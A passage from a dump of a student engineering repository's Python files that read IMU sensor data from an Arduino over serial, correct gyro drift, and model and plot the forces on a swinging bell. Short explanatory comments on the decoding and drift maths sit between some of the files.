# y acceleration, /100 to convert to m/s/s\n omegazlist.append(gyrz/900) # z velocity, /900 to convert to rad/s\n counterlist.append(encoder) # encoder count\n tlist.append(millis/1000) # time, /1000 to convert to s\n\n taxis=tlist-tlist[0] # adjust the time at the plot origin to zero\n tmin=max(taxis[0],taxis[-1]-twidth)\n tmax=max(taxis[0]+twidth,taxis[-1])\n axes1.set_xlim(tmin,tmax)\n axes1.set_ylim(min(aylist),max(aylist))\n axes2.set_xlim(tmin,tmax)\n axes2.set_ylim(min(counterlist)-1,max(counterlist)+1)\n axes3.set_xlim(tmin,tmax)\n axes3.set_ylim(min(omegazlist),max(omegazlist))\n axes4.set_xlim(tmin,tmax)\n axes4.set_ylim(min(axlist),max(axlist))\n line1.set_data(taxis,aylist)\n line2.set_data(taxis,counterlist)\n line3.set_data(taxis,omegazlist)\n line4.set_data(taxis,axlist)\n return line\n\nfig.canvas.mpl_connect('key_press_event', press)\n\nanimation = FuncAnimation(fig, update, init_func=init, interval=1, blit=False)\n# interval is in ms, set shorter than time step of data sent by Arduino,\n# so that update occurs as soon as data arrives from Arduino\n\nplt.show()\n"
},
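The bit-shift reconstruction inside COLE.py's update() (millis, accx, gyrz, encoder) is plain little-endian byte decoding of the COBS-decoded frame; a small equivalence check (my sketch, with arbitrary example bytes):

payload = bytes([0x10, 0x27, 0x00, 0x00])            # 10000 encoded little-endian
millis = payload[0] | payload[1] << 8 | payload[2] << 16 | payload[3] << 24
assert millis == int.from_bytes(payload, 'little') == 10000

# Signed fields (accx, accy, gyrz, encoder) also need the sign bit honoured,
# which the file gets by wrapping the shifted result in np.int16:
acc = bytes([0xFE, 0xFF])                            # int16 value -2
assert int.from_bytes(acc, 'little', signed=True) == -2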
{
"alpha_fraction": 0.7149614095687866,
"alphanum_fraction": 0.7313916087150574,
"avg_line_length": 54.79166793823242,
"blob_id": "e67e76acf39562e6b3ac81b593ad4d22c4da9911",
"content_id": "780393d82179a2f8116ef9ec790c7c90ef04effd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4019,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 72,
"path": "/drift_visualiser.py",
"repo_name": "ShuowangHe/IIB-Project2",
"src_encoding": "UTF-8",
"text": "#Imports\nimport numpy as np\nimport matplotlib\nfrom matplotlib import pyplot as plt\nfrom numpy import genfromtxt\nimport scipy\nfrom scipy import integrate\nfrom scipy.signal import find_peaks\n\n#Gather and unpack data from CSV\nfile = '/Users/shuowanghe/github/IIB-Project2/data/adafruitapril15th/freeswing.csv'\ndata = genfromtxt(file,delimiter=',')\ntimestamps = data[:,0]\na_r = data[:,1]\na_theta = data[:,2]\ntheta_dot = data[:,3]*1.07\n#Smooth the radial acceleration signal\nfiltered_a_r = scipy.signal.savgol_filter(a_r,window_length=21, polyorder=2)\n#Differentiate gyro signal to get angular acceleration, then smooth with Sav-Gol filter\ntheta_double_dot = np.gradient(theta_dot,timestamps)\nfiltered_theta_double_dot = scipy.signal.savgol_filter(theta_double_dot,window_length=25, polyorder=3)\n#Get theta=0 time stamps from filtered radial acceleration signal\ntheta_zeros,_ = scipy.signal.find_peaks(filtered_a_r,prominence=5)\n#Integrate gyro signal from first theta=0 to get angle vs time, but will drift\ntheta = scipy.integrate.cumtrapz(theta_dot[theta_zeros[0]:],timestamps[theta_zeros[0]:],initial=0)\n\n#Function for getting angle from gyro by re-integrating at every theta=0 and distributing the drift\ndef get_theta(data):\n timestamps = data[:,0] #unpack the data again, filter a_r and find theta=0s\n a_r = data[:,1]\n ang_vel = data[:,3]*1.07\n filtered_a_r = scipy.signal.savgol_filter(a_r,window_length=21, polyorder=2)\n theta_zeros,_ = scipy.signal.find_peaks(filtered_a_r,prominence=5)\n theta = np.zeros(len(timestamps)) #generate empty array to hold theta\n for _ in theta_zeros: #hard re-integrate at every theta=0\n time_section = timestamps[_:]\n theta_dot_section = ang_vel[_:]\n theta[_:] = scipy.integrate.cumtrapz(theta_dot_section,time_section,initial=0)\n theta_int_once = scipy.integrate.cumtrapz(ang_vel[theta_zeros[0]:],timestamps[theta_zeros[0]:],initial=0)\n theta_fix = np.zeros(len(timestamps)) #generate an array to hold the fixed theta\n theta_fix[theta_zeros[0]:] = theta_int_once #put the hard integrated theta between the first 2 zeros\n prev_zero = theta_zeros[0] #initiate the last theta=0 as the first one for the loop\n for _ in theta_zeros[1:]: #reintegrate and correct drift\n time_section = timestamps[prev_zero:_+1] #carve out the section between the 2 zeros\n theta_dot_section = ang_vel[prev_zero:_+1]\n theta_section = scipy.integrate.cumtrapz(theta_dot_section,time_section,initial=0) #make the integration\n drift = theta_section[-1] #find the drift at the end of the swing\n drift_vec = np.linspace(start=0,stop=drift,num=_-prev_zero+1) #generate a vector increasing steadily from 0 to the drift over that time frame\n theta_fix[prev_zero:_] = theta_section[:-1]-drift_vec[:-1] #make the correction so last theta=0\n prev_zero = _ #store the zero point for the next loop\n return theta,theta_fix #returns both the hard reintegrated theta and the drift-fixed theta\n\n#Plot to compare reintegrated theta vs once integrated theta\nplt.plot(timestamps,get_theta(data)[0],label=r'Re-zeroed $\\theta$',linewidth=5)\nplt.plot(timestamps,get_theta(data)[1],label=r'Re-zeroed and drift corrected $\\theta$',linewidth=3)\nplt.plot(timestamps[theta_zeros[0]:],theta,label=r'$\\theta$ integrated from 1st zero')\nplt.plot(timestamps[theta_zeros],np.zeros(len(theta_zeros)),'gx',label=r'$\\theta=0$')\nplt.legend(loc='lower right')\nplt.title(r'Comparison of $\\theta$ calculated from initial zero vs recalculated at every 
zero')\nplt.xlabel('time(s)')\nplt.ylabel(r'$\\theta$(rad)')\nplt.show()\n\n#Plot to show filtered radial acceleration to find all theta=0 time stamps\nplt.plot(timestamps,a_r,label=r'measured $a_r$')\nplt.plot(timestamps,filtered_a_r,label=r'measured $a_r$ with Savitzky–Golay filter')\nplt.plot(data[theta_zeros,0],filtered_a_r[theta_zeros],'x')\nplt.legend()\nplt.title(r'Filtered vs unfiltered $a_r$, used to find all $\\theta=0$')\nplt.xlabel('time(s)')\nplt.ylabel(r'$a_r$(m/$s^2$)')\nplt.show()\n"
},
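The drift correction implemented by get_theta above can be stated compactly (my restatement of the loop): between consecutive zero crossings t_i and t_{i+1}, with residual drift D_i = \int_{t_i}^{t_{i+1}} \dot{\theta}\,d\tau, the corrected angle is

\theta_{\mathrm{fix}}(t) \;=\; \int_{t_i}^{t} \dot{\theta}\,d\tau \;-\; D_i\,\frac{t - t_i}{t_{i+1} - t_i},
\qquad t_i \le t < t_{i+1},

which forces the integral back to zero at each crossing. (The code distributes the drift linearly in sample index via linspace, which is equivalent for uniform sampling.)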
{
"alpha_fraction": 0.6462264060974121,
"alphanum_fraction": 0.6725067496299744,
"avg_line_length": 29.91666603088379,
"blob_id": "71ce7a56dfa5f1ef852e59e41982331d8cb0e4e4",
"content_id": "9e2341553e88ca05a768596339538cf2e6ef1c3f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1484,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 48,
"path": "/adafruit_plotter.py",
"repo_name": "ShuowangHe/IIB-Project2",
"src_encoding": "UTF-8",
"text": "from numpy import genfromtxt\nimport numpy as np\nimport scipy as sp\nfrom scipy.signal import find_peaks\nimport csv\nimport matplotlib.pyplot as plt\n\nfile = '/Users/shuowanghe/github/IIB-Project/test.csv'\ndata = genfromtxt(file, delimiter=',')\naxpeaks,_ = sp.signal.find_peaks(data[:,1],height=5,distance=50)\naypeaks,_ = sp.signal.find_peaks(data[:,2],height=0,distance=40)\ngzpeaks,_ = sp.signal.find_peaks(data[:,3],height=0,distance=50)\nzeros = min(aypeaks, key=lambda x:abs(x))\nprint(zeros)\n#plot 1 (x acceleration)\nplt.plot(data[:,0],data[:,1])\nplt.plot(data[axpeaks,0],data[axpeaks,1],\"x\")\nplt.xlabel('Time (s)')\nplt.ylabel('Normal Acceleration (m/s/s)')\nplt.show()\n#plot 2 (y acceleration)\nplt.plot(data[:,0],data[:,2])\nplt.plot(data[aypeaks,0],data[aypeaks,2],\"x\")\nplt.plot(data[zeros,0],data[zeros,2],\"x\",color='b')\nplt.xlabel('Time (s)')\nplt.ylabel('Tangential Acceleration (m/s/s)')\nplt.show()\n#plot 3 (z angular velocity)\nplt.plot(data[:,0],data[:,3])\nplt.plot(data[gzpeaks,0],data[gzpeaks,3],\"x\")\nplt.xlabel('Time (s)')\nplt.ylabel('Angular velocity (rad/s)')\nplt.show()\n#plot 4 (all plots)\nplt.plot(data[:,0],data[:,1])\nplt.plot(data[:,0],data[:,2])\nplt.plot(data[:,0],data[:,3])\nfor xc in axpeaks:\n xc = data[xc,0]\n plt.axvline(x=xc,color='b',linestyle='--')\n#for xc in aypeaks:\n #xc = data[xc,0]\n #plt.axvline(x=xc,color='r',linestyle='--')\nfor xc in gzpeaks:\n xc = data[xc,0]\n plt.axvline(x=xc,color='g',linestyle='--')\nplt.xlabel('Time (s)')\nplt.show()\n"
},
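For context on the find_peaks keyword arguments used in adafruit_plotter.py (my gloss, assuming the ~50 Hz sample rate implied by dt = 1/50 elsewhere in this repo): distance=50 rejects any peak within 50 samples (~1 s) of a stronger one, and height sets a minimum amplitude.

import numpy as np
from scipy.signal import find_peaks

t = np.arange(0, 10, 0.02)              # 50 Hz synthetic signal
sig = np.sin(2*np.pi*0.5*t)             # one peak every 2 s
peaks, props = find_peaks(sig, height=0.5, distance=50)
# -> 5 peaks, 100 samples (2 s) apart, each at least 0.5 high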
{
"alpha_fraction": 0.6632564067840576,
"alphanum_fraction": 0.6863300204277039,
"avg_line_length": 35.4603157043457,
"blob_id": "0ffcf2e332631350336110d924730a5d9c908528",
"content_id": "571cdc4a085f53bf20b8131fffa53fe597982fd8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4594,
"license_type": "no_license",
"max_line_length": 164,
"num_lines": 126,
"path": "/adafruit.py",
"repo_name": "ShuowangHe/IIB-Project2",
"src_encoding": "UTF-8",
"text": "# THIS CELL SHOULD ONLY NEED TO BE RUN ONCE, AT THE BEGINNING OF THE SESSION.\n\n# EDIT THESE LINES\n\ncomport='/dev/cu.usbmodem14101' # Enter the COM port number. Default is comport='COM4'\nwatermark='WordWord' # Enter the two 4-letter words provided to you by the demonstrator. Default is watermark='WordWord'\nuserids=['userid1','userid2'] # Enter list of lab group's userids; whoever is logged on should be listed first. Default is userids=['userid1','userid2']\ncarnumber=0 # Enter the car number (integer in the range 1-8). Default is carnumber=0\n# DO NOT CHANGE ANYTHING BELOW THIS LINE\n\n#\n# Import python packages\n#\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nimport math\nimport serial\nimport time\nimport numpy as np\nfrom numpy import genfromtxt\nimport csv\nfrom cobs import cobs\nfrom scipy import integrate\n\n#\n# Open the USB port into which the radio is plugged\n#\nprint('Wait a few seconds for serial port to open...')\ntry:\n ser = serial.Serial(comport, baudrate=57600)\n ser.isOpen() # try to open the port; will cause error if port is already open\nexcept IOError: # if the port is already open, close it and open it again\n ser.close()\n ser.open()\n\ntime.sleep(2) # pause for 2 seconds to allow port to settle down\nser.flush() # flush the port to remove any spurious data\nprint('Serial port open:',ser.name) # print name of port to confirm correct opening\n\n#\n# Define a function to read a line of data from the serial port.\n#\n# The arduino sends a line of data from the Arduino twenty times a second.\n# Each line contains: one measurement from each sensor; the time; and a checksum.\n# Each line is terminated by an end of line character.\ndef readmotiondata():\n eol = bytes([0]) # define the end of line character as a zero byte\n leneol = len(eol)\n motiond = bytearray() # set up an array of bytes\n while True:\n c = bytes(ser.read()) # read a byte from the serial port into variable c\n if c == eol:\n break # if the end of line character is read, return from the function with the bytes in motiond\n else:\n motiond += c # otherwise append the byte to the array\n return bytes(motiond)\n# Execute the readmotiondata function once to read the first (possibly incomplete) line of bytes and ignore it\nreadmotiondata()\n\n#\n# Initialise some variables\n#\nmotiondata=np.array([],dtype='uint16') # Initialise a numpy array of unsigned 16-bit (two byte) integers\naxlist=[] # initialise some python lists (lists are computationally more efficient than numpy arrays when we don't know the final size)\naylist=[]\nomegazlist=[]\ntlist=[]\ncounterlist=[]\n\n\naxlist[:]=[] # empty the lists\naylist[:]=[]\nomegazlist[:]=[]\ntlist[:]=[]\ncounterlist[:]=[]\n\nfor x in range(150): # read sufficient number of lines from serial port to flush buffer before recording/plotting\n readmotiondata()\n\n\ndef update():\n motioncoded = readmotiondata() # serial read into bytes object converted to list of ints, last element is line feed\n try:\n motiondata = cobs.decode(motioncoded) #cobs\n except cobs.DecodeError:\n print('COBS DecodeError')\n else:\n motiondata = list(motiondata) # bytes object converted to list of ints, last element is line feed\n checksumrecvd=np.sum(motiondata[0:-1],dtype=np.uint8) # checksum\n if (checksumrecvd != motiondata[-1]):\n print('Checksum error')\n else:\n millis=np.uint32(motiondata[0] | motiondata[1]<<8 | motiondata[2]<<16 | motiondata[3]<<24)\n accx=np.int16(motiondata[4] | motiondata[5]<<8)\n accy=np.int16(motiondata[6] | 
motiondata[7]<<8)\n gyrz=np.int16(motiondata[20] | motiondata[21]<<8)\n encoder=np.int16(motiondata[22] | motiondata[23]<<8) # 22 = 4 time bytes + 18 imu bytes\n\n return (millis, accx, accy, gyrz, encoder)\nsecs = 0\n\n\nfile = '/Users/shuowanghe/github/IIB-Project2/data/adafruitmay26th/onesidepush4.csv'\n\nwhile secs<=60:\n (millis, accx, accy, gyrz, encoder) = update()\n secs = millis/1000\n accx = accx/100\n accy = accy/100\n gyrz = gyrz/900\n with open(file,'a',) as newFile:\n newFileWriter = csv.writer(newFile)\n newFileWriter.writerow([secs,accx,accy,gyrz])\n print('Elapsed Time:',\"%.2f\" % round(secs,2),'s, Ax:',\"%.2f\" % round(accx,2),'m/s/s, Ay:',\"%.2f\" % round(accy,2),'m/s/s, GyroZ:',\"%.2f\" % round(gyrz,2),'rad/s')\n\ndata = genfromtxt(file, delimiter=',')\nts = data[:,0]\nax = data[:,1]\nay = data[:,2]\ngz = data[:,3]\nplt.plot(ts,ax)\nplt.show()\nplt.plot(ts,ay)\nplt.show()\nplt.plot(ts,gz)\nplt.show()\n"
},
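Two details of adafruit.py's logging loop are worth flagging: update()'s return sits outside the try/else, so after a COBS or checksum error it touches variables that were never assigned (raising UnboundLocalError), and the CSV file is re-opened for every sample. A sketch guarding both (reusing the file's file, csv and update names; not the repository's code):

def safe_update():
    # update() reaches its return even when decode/checksum failed; in that
    # case millis etc. were never bound, so convert the error to None.
    try:
        return update()
    except UnboundLocalError:
        return None

with open(file, 'a') as newFile:
    writer = csv.writer(newFile)
    secs = 0
    while secs <= 60:
        sample = safe_update()
        if sample is None:               # decode or checksum error: skip
            continue
        millis, accx, accy, gyrz, encoder = sample
        secs = millis / 1000
        writer.writerow([secs, accx/100, accy/100, gyrz/900])  # same unit scaling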
{
"alpha_fraction": 0.6189965009689331,
"alphanum_fraction": 0.6399248838424683,
"avg_line_length": 56.7829475402832,
"blob_id": "64fd0193413a6e69c3171f7802b104a946440f22",
"content_id": "62243e09b09e138330839ec1c8483ee19819756d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7454,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 129,
"path": "/visualisation_plots.py",
"repo_name": "ShuowangHe/IIB-Project2",
"src_encoding": "UTF-8",
"text": "###-------------------------------------------------------------------------###\n###---------------------------------IMPORTS---------------------------------###\n###-------------------------------------------------------------------------###\nimport numpy as np\nimport matplotlib\nfrom matplotlib import pyplot as plt\nfrom numpy import genfromtxt\nimport scipy\nfrom scipy import integrate\nfrom scipy.signal import find_peaks\nfrom matplotlib import animation\nfrom statsmodels.graphics import tsaplots\n###-------------------------------------------------------------------------###\n###--------------------------------FUNCTIONS--------------------------------###\n###-------------------------------------------------------------------------###\n#Function for getting angle from gyro by re-integrating at every theta=0 and distributing the drift\ndef get_theta(data):\n #find theta=zeros\n a_r = data[:,1]\n filtered_a_r = scipy.signal.savgol_filter(a_r,window_length=21, polyorder=2)\n theta_zeros,_ = scipy.signal.find_peaks(filtered_a_r,prominence=5)\n #integrate theta and distribute drift before every zero\n theta_dot_correction_factor = 1.07\n timestamps = data[:,0]\n theta_dot = data[:,3]*theta_dot_correction_factor\n theta_int_once = scipy.integrate.cumtrapz(theta_dot[theta_zeros[0]:],timestamps[theta_zeros[0]:],initial=0)\n theta_fix = np.zeros(len(timestamps)) #generate an array to hold the fixed theta\n theta_fix[theta_zeros[0]:] = theta_int_once #put the hard integrated theta between the first 2 zeros\n prev_zero = theta_zeros[0] #initiate the last theta=0 as the first one for the loop\n for _ in theta_zeros[1:]: #reintegrate and correct drift\n time_section = timestamps[prev_zero:_+1] #carve out the section between the 2 zeros\n theta_dot_section = theta_dot[prev_zero:_+1]\n theta_section = scipy.integrate.cumtrapz(theta_dot_section,time_section,initial=0) #make the integration\n drift = theta_section[-1] #find the drift at the end of the section\n drift_vec = np.linspace(start=0,stop=drift,num=_-prev_zero+1) #generate a vector increasing steadily from 0 to the drift over that time frame\n theta_fix[prev_zero:_] = theta_section[:-1]-drift_vec[:-1] #make the correction so the last theta=0\n prev_zero = _ #store the zero point for the next loop\n return theta_fix #returns the drift-fixed theta\n\n#Function for getting the gradient in the sin(theta) vs ang accel equation\ndef get_gradient(data):\n theta = get_theta(data) #get drift corrected theta from the data\n x = np.sin(theta)[theta_zeros[0]:]\n y = scipy.signal.savgol_filter(np.gradient(data[:,3]*1.07,data[:,0]),window_length=25, polyorder=3)[theta_zeros[0]:]\n allowed_indices = np.where(abs(x)<0.2) #find indices where line is straight\n p = np.polyfit(x[allowed_indices],y[allowed_indices],deg=1) #fit a line through all of the data points within the cutoff\n plt.plot(x,y,'x') #plot all the data points\n plt.plot(x[allowed_indices],y[allowed_indices],'gx') #plot the allowed data points for fitting\n plt.plot(x,p[0]*x,'r') #plot the fitted line, through the origin\n plt.show()\n return p[0]\n\n###-------------------------------------------------------------------------###\n###----------------------------------DATA-----------------------------------###\n###-------------------------------------------------------------------------###\n#Gather and unpack data from CSV\nfile = '/Users/shuowanghe/github/IIB-Project2/data/adafruitapril15th/2sidepush.csv'\ndata = genfromtxt(file,delimiter=',')\ntimestamps = data[:,0]\na_r = 
data[:,1]\na_theta = data[:,2]\ntheta_dot = data[:,3]*1.07\n#Smooth the radial acceleration signal\nfiltered_a_r = scipy.signal.savgol_filter(a_r,window_length=21, polyorder=2)\n#Differentiate gyro signal to get angular acceleration, then smooth with Sav-Gol filter\ntheta_double_dot = np.gradient(theta_dot,timestamps)\nfiltered_theta_double_dot = scipy.signal.savgol_filter(theta_double_dot,window_length=25, polyorder=3)\n#Get theta=0 time stamps from filtered radial acceleration signal\ntheta_zeros,_ = scipy.signal.find_peaks(filtered_a_r,prominence=5)\n\n#get the -mlg/J gradient from fitting the straight part of the graph\np = get_gradient(data)\n#Use re-integrated, drift corrected theta from now on\ntheta = get_theta(data)\n#Calculate some force quantity T/J\nforce = filtered_theta_double_dot[theta_zeros[0]:]-p*np.sin(theta[theta_zeros[0]:])\npeaks,_ = scipy.signal.find_peaks(abs(scipy.signal.savgol_filter(force,window_length=25, polyorder=3)),prominence=None)\n\n\n\n###-------------------------------------------------------------------------###\n###----------------------------------PLOTS----------------------------------###\n###-------------------------------------------------------------------------###\n#Plot bell angle against some force calculation\nforce = filtered_theta_double_dot[theta_zeros[0]:]-p*np.sin(theta[theta_zeros[0]:])\npeaks,_ = scipy.signal.find_peaks(abs(scipy.signal.savgol_filter(force,window_length=25, polyorder=3)),prominence=None)\ntsaplots.plot_acf(force,lags=2000)\nplt.show()\nplt.plot(timestamps[theta_zeros[0]:],force,label=\"Force measurement\")\n#plt.plot(timestamps[theta_zeros[0]:][peaks],scipy.signal.savgol_filter(force,window_length=25, polyorder=3)[peaks],'x')\nplt.plot(timestamps[theta_zeros[0]:],scipy.signal.savgol_filter(force,window_length=25, polyorder=3),label=\"Force measurement (Smoothed)\")\nplt.plot(timestamps[theta_zeros[0]:],theta[theta_zeros[0]:],label=r'$\\theta$')\nplt.plot(timestamps[theta_zeros[0]:],theta_dot[theta_zeros[0]:],label=r'$\\dot{\\theta}$')\n\n#plt.plot(timestamps[theta_zeros[0]:],filtered_theta_double_dot[theta_zeros[0]:])\n#plt.plot(timestamps[theta_zeros[0]:],p*np.sin(theta[theta_zeros[0]:]))\nplt.xlabel(r't(s)')\nplt.ylabel(r'$\\\"{\\theta}+\\frac{mgl}{J}sin(\\theta)$(rad/$s^2$)')\nplt.axhline(0,color='b',linestyle='--')\nplt.title(r'$\\frac{T}{J}$ vs time')\nplt.legend()\nplt.show()\nprint(-p)\nplt.plot(-p*np.sin(theta[theta_zeros[0]:]),force)\nplt.show()\n\n#Other plots for visualisation\n#plt.plot(timestamps,theta_dot,label='measured ang vel')\nplt.plot(timestamps,scipy.signal.savgol_filter(a_theta,window_length=21, polyorder=2),label='measured tangential acc')\n#plt.plot(timestamps,a_r,label='measured radial acc')\n#plt.plot(timestamps_trunc1[:-1],theta1,label='theta (from integration)')\n#plt.plot(timestamps_trunc2[:-1],abs(theta2),'b')\n#plt.plot(data[theta_zeros,0],theta_dot[theta_zeros],'x')\n#plt.plot(timestamps,theta_double_dot,label='theta double dot (from diff)')\n#plt.plot(timestamps,filtered_theta_double_dot,label='theta double dot (from diff and filtered)')\n#plt.plot(timestamps_trunc1[:-1],9.81*np.cos(theta1)+0.43*np.square(theta_dot_trunc1[:-1]),label='radial acc prediction')\n#plt.plot(timestamps_trunc1[:-1],a_r[first_theta_zero_idx:-1]-9.81*np.cos(theta1),label='r thetadot^2')\n#plt.plot(timestamps_trunc1[:-1],a_r[first_theta_zero_idx:-1]+9.81*np.sin(theta1),label='L theta double 
dot')\n#plt.plot(timestamps,5*np.square(theta_dot),label='thetadot^2')\n#plt.plot(timestamps_trunc1[:-1],np.cos(theta1),label='cos(theta)')\n#plt.plot(theta_double_dot[-len(timestamps_trunc1):-1],-np.sin(theta1))\n#plt.plot(a_theta[-len(timestamps_trunc1):-861],-np.sin(theta1[0:200]))\nplt.legend(loc='lower left')\nplt.axhline(0,color='b',linestyle='--')\n#plt.xlim(0,timestamps[-1])\n#plt.ylim(-5,5)\nplt.title('Other temporal plots that may be of interest for visualisation')\nplt.xlabel('time(s)')\nplt.show()\n"
},
{
"alpha_fraction": 0.6153846383094788,
"alphanum_fraction": 0.6380090713500977,
"avg_line_length": 33.894737243652344,
"blob_id": "a8c4ed38e5fa79d5bdab750d10d845a81b3e5d2a",
"content_id": "2b6561acf5b8e55d7ea13e19b936dc197047a9ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 663,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 19,
"path": "/Serial_reader.py",
"repo_name": "ShuowangHe/IIB-Project2",
"src_encoding": "UTF-8",
"text": "import serial\nimport time\nimport csv\n\narduino = serial.Serial('/dev/cu.usbmodem14101',38400)\nstart_time = time.time()\narray = []\ni=0\nwhile True:\n serial_output = str(arduino.readline())\n if serial_output:\n elapsed_time = time.time()-start_time\n str_idx = serial_output.find('g:')\n mass = float(serial_output[str_idx+3:-8])\n array.append([elapsed_time,mass])\n print('Elapsed Time:',\"%.3f\" % round(elapsed_time,2),'s, Mass:',mass,'kg')\n with open('/Users/shuowanghe/github/IIB-Project/test.csv','a',) as newFile:\n newFileWriter = csv.writer(newFile)\n newFileWriter.writerow([elapsed_time,mass])\n"
},
{
"alpha_fraction": 0.6291501522064209,
"alphanum_fraction": 0.6446847319602966,
"avg_line_length": 51.95161437988281,
"blob_id": "4bd1eba1be0880e06e1f1106f89238b9952a5363",
"content_id": "0ab1d66ec069c8b3aea9464102e1f7494ad6286b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13132,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 248,
"path": "/optimised_corrections.py",
"repo_name": "ShuowangHe/IIB-Project2",
"src_encoding": "UTF-8",
"text": "###-------------------------------------------------------------------------###\n###---------------------------------IMPORTS---------------------------------###\n###-------------------------------------------------------------------------###\nimport numpy as np\nimport matplotlib\nfrom matplotlib import pyplot as plt\nfrom numpy import genfromtxt\nimport scipy\nfrom scipy import integrate\nfrom scipy.optimize import least_squares\nfrom scipy.signal import find_peaks\nfrom scipy.signal import savgol_filter\nfrom scipy.integrate import cumtrapz\nfrom matplotlib import animation\n###-------------------------------------------------------------------------###\n###------------------------UNPACK DATA AND GET ZEROS------------------------###\n###-------------------------------------------------------------------------###\n#Gather and unpack data from CSV\nuserinput_file = '/Users/shuowanghe/github/IIB-Project2/data/adafruitmay5th/userinput.csv'\nuserinput = genfromtxt(userinput_file,delimiter=',')\nfreeswing_file = '/Users/shuowanghe/github/IIB-Project2/data/adafruitmay5th/freeswing.csv'\nfreeswing = genfromtxt(freeswing_file,delimiter=',')\ntimestamps,a_r,a_theta,theta_dot = userinput[:,0], userinput[:,1], userinput[:,2], userinput[:,3]\n#Differentiate gyro signal to get angular acceleration, then smooth with Sav-Gol filter\ntheta_double_dot = np.gradient(theta_dot,timestamps)\nfiltered_theta_double_dot = savgol_filter(theta_double_dot,window_length=25, polyorder=3)\n#Smooth the radial acceleration signal to find theta=zeros\nfiltered_a_r = savgol_filter(a_r,window_length=21, polyorder=2)\ntheta_zeros,_ = find_peaks(filtered_a_r,prominence=0.5)\nstart = theta_zeros[0]\n###-------------------------------------------------------------------------###\n###--------------------------------FUNCTIONS--------------------------------###\n###-------------------------------------------------------------------------###\n#Function for getting angle from gyro by re-integrating at every theta=0 and distributing the drift\ndef get_theta(data):\n #find theta=zeros\n timestamps = data[:,0]\n a_r = data[:,1]\n theta_dot = data[:,3]\n filtered_a_r = savgol_filter(a_r,window_length=21, polyorder=2)\n theta_zeros,_ = find_peaks(filtered_a_r,prominence=5)\n start = theta_zeros[0]\n #integrate theta and distribute drift before every zero\n theta_int_once = cumtrapz(theta_dot[start:],timestamps[start:],initial=0)\n theta_fix = np.zeros(len(timestamps)) #generate an array to hold the fixed theta\n theta_fix[start:] = theta_int_once #put the hard integrated theta between the first 2 zeros\n prev_zero = start #initiate the last theta=0 as the first one for the loop\n for _ in theta_zeros[1:]: #reintegrate and correct drift\n time_section = timestamps[prev_zero:_+1] #carve out the section between the 2 zeros\n theta_dot_section = theta_dot[prev_zero:_+1]\n theta_section = cumtrapz(theta_dot_section,time_section,initial=0) #make the integration\n drift = theta_section[-1] #find the drift at the end of the section\n drift_vec = np.linspace(start=0,stop=drift,num=_-prev_zero+1) #generate a vector increasing steadily from 0 to the drift over that time frame\n theta_fix[prev_zero:_] = theta_section[:-1]-drift_vec[:-1] #make the correction so the last theta=0\n prev_zero = _ #store the zero point for the next loop\n return theta_fix #returns the drift-fixed theta\n\n#Function for getting the gradient in the sin(theta) vs ang accel equation\ndef get_gradient(data):\n theta = get_theta(data) #get drift corrected theta from 
the data #find theta=zeros\n timestamps = data[:,0]\n theta_dot = data[:,3]\n a_r = data[:,1]\n filtered_a_r = savgol_filter(a_r,window_length=21, polyorder=2)\n theta_zeros,_ = find_peaks(filtered_a_r,prominence=5)\n start = theta_zeros[0]\n theta_double_dot = np.gradient(theta_dot,timestamps)\n x = np.sin(theta)[start:]\n y = savgol_filter(theta_double_dot,window_length=25, polyorder=3)[start:]\n p = np.polyfit(x,y,deg=1)[0] #fit a line through all of the data points\n return p\n\n#Function for finding where force is being applied\ndef forcefinder(force):\n smooth_force = savgol_filter(force,window_length=45,polyorder=3)\n low_smooth_force = savgol_filter(force,window_length=35,polyorder=3)\n peaks,_ = find_peaks(abs(low_smooth_force),prominence=1)\n peak_matrix = np.zeros((len(peaks),3))\n peak_matrix[:,1] = peaks\n peaks = np.append(peaks,len(smooth_force))\n prev_peak = 0\n count = 0\n for i in peaks:\n mini_peaks_before,_ = find_peaks(abs(low_smooth_force)[prev_peak:i],prominence=0)\n begin = mini_peaks_before[-1]+prev_peak\n prev_end = mini_peaks_before[0]+prev_peak\n if count != len(peaks)-1:\n peak_matrix[count,0] = begin\n if count != 0:\n peak_matrix[count-1,2] = prev_end\n prev_peak = i\n count+=1\n return peak_matrix\n\n###-------------------------------------------------------------------------###\n###-------------------------------OPTIMISATION------------------------------###\n###-------------------------------------------------------------------------###\n#Optimise correction parameters for freeswing\ndef force_func(corrections):\n theta_correction_factor,gradient_correction_factor,theta_offset = corrections[0],corrections[1],corrections[2]\n theta = get_theta(freeswing)*theta_correction_factor+theta_offset\n theta_double_dot = np.gradient(freeswing[:,3],freeswing[:,0])\n filtered_theta_double_dot = savgol_filter(theta_double_dot,window_length=25, polyorder=3)*theta_correction_factor\n p = get_gradient(freeswing)*gradient_correction_factor\n force = filtered_theta_double_dot[start:]-p*np.sin(theta[start:])\n return sum(abs(force))\nres=least_squares(fun=force_func, x0=[1,1,0])\nprint(\"theta factor: \",res.x[0],\"\\ngradient factor: \",res.x[1],\"\\ntheta offset: \",res.x[2],\"\\ncost: \",res.fun)\ntheta_correction_factor,gradient_correction_factor,theta_offset = res.x[0],res.x[1],res.x[2]\n#get the -mlg/J gradient from fitting the userinput graph\np = get_gradient(userinput)\n#Use re-integrated, drift corrected theta from now on\ntheta = get_theta(userinput)\n#Calculate some force quantity T/J using just the userinput data\nforce = filtered_theta_double_dot[start:]-p*np.sin(theta[start:])\nsmooth_force = savgol_filter(force,window_length=25, polyorder=3)\n#Calculate it post corrections from freeswing data\np_corrected = p*gradient_correction_factor\ntheta_corrected = theta*theta_correction_factor+theta_offset\ntheta_dot_corrected = theta_dot*theta_correction_factor\nforce_corrected = theta_correction_factor*filtered_theta_double_dot[start:]-p_corrected*np.sin(theta_corrected[start:])\nsmooth_force_corrected = 